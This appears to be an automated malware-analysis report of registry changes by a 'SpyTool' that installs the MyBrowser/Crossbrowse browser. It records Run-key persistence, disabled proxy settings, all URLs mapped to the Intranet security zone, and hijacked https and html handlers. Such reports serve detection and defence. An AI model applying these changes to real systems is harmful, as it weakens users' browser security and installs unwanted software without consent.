[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsk3C.tmp:192 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 0F 66 A5 C1 94 7A 5E AD B3 71 DF ED B5 9C C0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Perl\bin]
"perl.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-6JM0V.tmp]
"nsx27.tmp"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-8964"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9217"
"SHELL32.dll,-9319"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nsk3C.tmp"
"nsb2E.tmp"
The process gmsd_re_005010096.exe:740 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF EC C4 AC 7E 75 7B F9 15 72 B5 EE AB 35 70 62"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process nsk15.tmp:1340 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 9C 87 EC 01 7C 2B B2 E2 DF F3 52 32 E5 DE C9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsj35.tmp:588 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"vpolicy" = "som"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 C4 1D 07 D2 6D 30 14 9E 08 98 FA 9E 9F 7D 3E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsb2E.tmp:908 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 71 53 44 42 47 8B E0 F9 A0 B4 04 1D C0 FD 4E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 8819.exe:368 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 98 73 21 25 40 56 E2 C1 7A F9 C5 99 89 41 92"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\5517]
"setup.exe" = "MyBrowser Installer"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nssF.tmp:1488 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 52 4F D1 21 92 E2 C5 0E FC 52 D5 9E B8 52 00"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process setup.exe:828 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
